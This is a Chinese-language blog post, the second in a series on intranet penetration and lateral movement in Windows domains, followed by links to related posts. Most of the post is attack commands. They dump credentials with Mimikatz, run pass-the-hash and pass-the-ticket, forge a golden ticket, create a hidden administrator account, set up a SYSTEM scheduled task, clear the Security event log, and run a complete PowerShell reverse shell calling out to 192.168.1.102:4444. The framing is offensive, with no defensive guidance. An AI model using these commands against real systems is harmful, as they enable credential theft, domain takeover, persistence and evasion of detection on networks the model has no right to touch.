内网渗透与横向移动 - 第二篇:高级横向移动技术

于 2024-08-15 13:08:59 发布
阅读量468 收藏 3
点赞数 13
文章标签: 哈希算法 算法 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_57898612/article/details/141219602
版权
1. 横向移动概述
  • 定义与背景:横向移动是攻击者在内网中扩展控制权的重要技术,目的是通过逐步控制更多主机和获取更多资源来进一步提升攻击效果。
  • 常见的横向移动技术:通过凭据窃取、Pass-the-Hash、Pass-the-Ticket、远程代码执行等手段在内网中进行移动。
2. 凭据窃取
  • Mimikatz工具使用
    • LSASS内存中提取凭据:通过Mimikatz工具从LSASS内存中提取明文密码、NTLM哈希、Kerberos票据等敏感信息。
  • 代码示例
    mimikatz # sekurlsa::logonpasswords
mimikatz # kerberos::list /export

    Pass-the-Hash攻击

  • 使用NTLM哈希进行身份验证:无需明文密码即可使用NTLM哈希在内网中进行横向移动。
  • 代码示例
    psexec.py DOMAIN/administrator@192.168.1.101 -hashes :31d6cfe0d16ae931b73c59d7e0c089c0
    3. 远程代码执行
  • SMB协议利用
    • 利用 wmiexec.py 进行远程代码执行:通过Windows Management Instrumentation (WMI) 远程执行命令。
  • 代码示例
    wmiexec.py DOMAIN/administrator@192.168.1.101

    远程桌面协议(RDP)劫持

  • 使用 RDPWrap:通过劫持RDP会话,获取目标主机的完全控制权。
  • 代码示例
    rdesktop -u admin -p password 192.168.1.101
    4. Kerberos攻击
  • Pass-the-Ticket攻击
    • 使用 Mimikatz 进行票据窃取与重放:通过获取并重放Kerberos票据,进行无密码的横向移动。
  • 代码示例
    mimikatz # kerberos::ptt <ticket.kirbi>

    黄金票据攻击

  • 创建与使用黄金票据:通过Mimikatz生成黄金票据,获取域内所有资源的访问权限。
  • 代码示例
    mimikatz # kerberos::golden /user:Administrator /domain:domain.com /sid:S-1-5-21-123456789-1234567890-1234567890 /krbtgt:<NTLM_HASH> /id:500
mimikatz # misc::cmd
    5. 横向移动中的持久化

  • 创建隐藏账户

    • 利用命令行创建隐藏的本地管理员账户:确保在横向移动过程中有备用的访问方式。
  • 代码示例
    net user hiddenAdmin Password123! /add
net localgroup administrators hiddenAdmin /add
reg add HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList /v hiddenAdmin /t REG_DWORD /d 0 /f

    Scheduled Tasks和WMI持久化

  • 创建持久化的Scheduled Task:在目标主机上设置自动任务。
  • 代码示例
    schtasks /create /sc onstart /tn "SysUpdate" /tr "cmd.exe /c whoami > C:\windows\temp\log.txt" /ru SYSTEM
    6. 隐匿与日志清理

  • 隐匿技术

    • 日志清理与进程隐藏:通过清理日志和隐藏恶意进程来躲避检测。
  • 代码示例
    wevtutil cl Security
taskkill /PID <pid> /F

    网络通信的隐匿

  • 使用 Powershell 与 C2 通信:使用Powershell脚本与C2服务器通信,避免被检测到。
  • 代码示例
    powershell -nop -w hidden -c "$client = New-Object 
System.Net.Sockets.TCPClient('192.168.1.102',4444);$stream = $client.GetStream();
[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, 
$i);$sendback = (iex $data 2>&1 | Out-String );$sendback2  = $sendback + 'PS ';$sendbyte = 
([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$
stream.Flush()}"

    这两篇中我们深入探讨了内网渗透与横向移动的技术,从信息收集、漏洞利用、权限提升到横向移动和持久化,以及如何隐匿攻击行为。共同努力,共同进步,加油伙伴们!

Hi, how are you
关注
  • 13
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
AHZY-内网安全攻防2020-01-12 第一章节ppt
08-21
攻击者一旦获取这些文件,就能轻易地在内网中进行横向移动和攻击。因此,确保配置文件的安全存储和传输至关重要。 5. **计划任务的安全性**: 计划任务通常按预定时间运行,如果以高权限执行且任务所在目录权限...
某第三支付边界机漏洞导致的内网渗透.pdf
04-08
### 某第三方支付边界机漏洞导致的内网渗透分析 #### 一、背景与起因 本案例涉及一起第三方支付公司边界机存在的安全漏洞,该漏洞被利用后导致内部网络遭受渗透攻击。通过此次事件,我们可以深入了解边界机在企业...
内网渗透横向移动 - 第一篇:深入理解内网渗透
最新发布
艰难的活着
08-15 553
好了,通过以上的初步了解,大家应该知道怎么操作了,咱们第二篇继续学习了解内网渗透。:使用PowerShell将数据导出到攻击者控制的服务器。
红蓝对抗下的内网横向移动渗透技术详解
lurenjia404的博客
07-02 1888
本文主要介绍了利用远程服务进行横向渗透的方法,读者阅读本章内容后就能够理解,红队人员一旦通过外部某一个点进入了企业内部网络之中,那么内网之中所有的安全防护设备将会形同虚设,红队人员在内网之中获取核心靶标的系统权限如同探囊取物。因此,如何有效地建立内网横向渗透安全防护体系就成了大部分企业及蓝队防守人员值得思考的问题,笔者希望通过本章对红队人员进行横向渗透所常利用的手法的介绍,读者能够对内网安全体系建设引起更多的重视和思考。
【内网安全横向移动-域渗透之资源约束委派
今天是几号的博客
04-06 660
基于资源的约束委派(RBCD)是在Windows Server 2012中新加入的功能,与传统的约束委派相比,它不再需要域管理员权限去设置相关属性。RBCD把设置委派的权限赋予了机器自身,既机器自己可以决定谁可以被委派来控制我。也就是说机器自身可以直接在自己账户上配置msDS-AllowedToActOnBehalfOfOtherIdentity属性来设置RBCD。计算机加⼊域时,加⼊域的域⽤户被控后也将导致使用当前域用户加入的计算机受控。
内网渗透测试:内网横向移动基础总结
从事厨房信息化行业,万能对接所有点餐系统,kds,智能控菜,酒店协调软件
06-12 253
Windows 7为跳板机用户名:douser密码:Dotest123Windows server 2008为域控(主机名:WIN-ENS2VR5TR3N)用户名:administrator密码:Liu78963攻击者已经获得了Windows7的权限,想要以Windows7作为跳板机进一步渗透内网的Windows server 2008,并且攻击者已经在跳板机上面通过socks代理等技术使自己可以访问到内网的Windows server 2008。
【内网安全横向移动-Wmi-Smb-CME密码喷射
qq_55349490的博客
07-18 1183
已经获取到了webserver服务器的权限横向移动到其他域内主机。
【内网安全横向移动-PTH哈希-PTT票据-PTK密钥
qq_55349490的博客
07-19 955
pass the hash(哈希传递攻击,简称pth)pass the ticket(票据传递攻击,简称ptt)pass the key(密钥传递攻击,简称ptk)PTH(pass the hash) 利用的lm或ntlm的值进行的渗透测试(NTLM认证攻击)PTK(pass the key) 利用的ekeys aes256进行的渗透测试(NTLM认证攻击)PTT(pass the ticket) 利用的票据凭证TGT进行渗透测试(Kerberos认证攻击)
内网横向移动—NTLM-Relay重放&Responder中继攻击&Ldap&Ews
剁椒鱼头没剁椒的博客
07-30 1104
在正常CS或者MSF上线的时候,我们的目标通常是普通用户上线,如何提权到system权限,但是有时候需要使用到administrator,就会导致我们没有会话去连接,那么这里就是介绍一下,如何切换会话中的权限,同时要注意的是,低权限会话是无法切换至高权限的,但是高权限能够切换至低权限,相当于system权限能够切换到administrator,但是webadmin权限是无法切换至administrator权限的,这个是需要注意的。看配置是需要4h4g…
【内网安全横向移动&NTLM-Relay重放&Responder中继攻击&Ldap&Ews
今天是几号的博客
04-02 1008
攻击者伪造一个恶意的SMB服务器,当内网中有机器Client1(webserver)访问这个攻击者精心构造好的SMB服务器时, smbrelayx.py 脚本将抓到 Client1 的 Net-NTLM Hash ,然后 smbrelayx.py 用抓取到的 Client1 的 Net-NTLM Hash 重放给 Client2(sqlserver)。Exchange,LLMNR投毒,
6、内网安全-横向移动&Wmi&Smb&CrackMapExec&ProxyChains&Impacket
m0_65842464的博客
02-16 1565
在内网环境中,主机192.168.3.31有外网网卡能出网,在取得该主机权限后上线,搭建web应用构造后门下载地址,利用该主机执行相关命令可以进行横向移动,通过传递命令其他主机也可访问下载主机192.168.3.31的后门并执行,从而拿下内网中更多不出网主机。前提:用户名密码明文或哈希值抓取1、内网安全-域信息收集&CS插件&Adfind&BloodHound-CSDN博客一、域横向移动-WMI-自带命令套件插件WMI是通过135端口进行利用,支持用户名明文或者hash。
Linux内网渗透.doc
07-08
本文将从拿到一个 Linux shell 开始,介绍 Linux 内网渗透技术,分为容器逃逸、Linux 提权、Linux 信息收集、Linux 隧道技术、Linux 横向移动、Linux 权限维持、Linux 痕迹清理几个部分。 一、容器逃逸 容器逃逸是...
#资源分享达人# 红蓝对抗之Windows内网渗透.zip
08-03
内网渗透测试】 内网渗透测试是一种模拟黑客攻击行为,对内部网络系统进行安全评估的方法。它旨在发现并修复组织内部网络中的安全漏洞,防止真实攻击者利用这些漏洞进行非法活动。红蓝对抗则是内网渗透测试的一种...
内网渗透中的文件传输(第五十三课).docx
09-15
### 内网渗透中的文件传输技术详解 #### 一、引言 在网络安全领域,内网渗透测试是一项重要的技能,它帮助安全专家评估网络安全性并发现潜在的漏洞。文件传输作为内网渗透过程中的一个关键环节,对于实现攻击...
算法的学习笔记—删除链表中重复的结点(牛客JZ76)
业精于勤,荒于嬉
08-14 856
本文介绍了一种删除排序链表中重复节点的高效算法。通过递归的方式,算法能够有效地删除所有重复节点,并保留链表中仅出现一次的节点。此方法的实现简单且易于理解,同时在时间和空间复杂度方面表现优异,适用于处理大规模数据链表中的重复节点问题。😁热门专栏推荐想学习vue的可以看看这个java基础合集数据库合集redis合集nginx合集linux合集手写机制微服务组件spring_尘觉springMVCmybits🤔欢迎大家加入我的社区尘觉社区。
【LeetCode每日一题】——623.在二叉树中增加一行
IronmanJay的博客
08-14 691
给定一个二叉树的根 root 和两个整数 val 和 depth ,在给定的深度 depth 处添加一个值为 val 的节点行。 注意,根节点 root 位于深度 1 。 加法规则如下: 给定整数 depth,对于深度为 depth - 1 的每个非空树节点 cur ,创建两个值为 val 的树节点作为 cur 的左子树根和右子树根。 cur 原来的左子树应该是新的左子树根的左子树。 cur 原来的右子树应该是新的右子树根的右子树。 如果 depth == 1 意味着 depth - 1 根本没有深度
代码随想录算法训练营第十一天
b1ankwall的博客
08-10 1245
参加代码随想录第43期算法训练营day11|150. 逆波兰表达式求值,239. 滑动窗口最大值,347.前 K 个高频元素,栈与队列总结
[算法2] 第二集 二叉树中的深度搜索
2301_80017277的博客
08-09 888
一、(DFS,全称为 Depth First Traversal),是我们树或者图这样的数据结构中常⽤的⼀种遍历算法。这个算法会尽可能深的搜索树或者图的分支,直到⼀条路径上的所有节点都被遍历完毕,然后再回溯到上⼀层,继续找⼀条路遍历。在⼆叉树中,常见的深度优先遍历为:前序遍历、中序遍历以及后序遍历。因为树的定义本⾝就是递归定义,因此采⽤递归的方法去实现树的三种遍历不仅容易理解⽽且代码很简洁。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值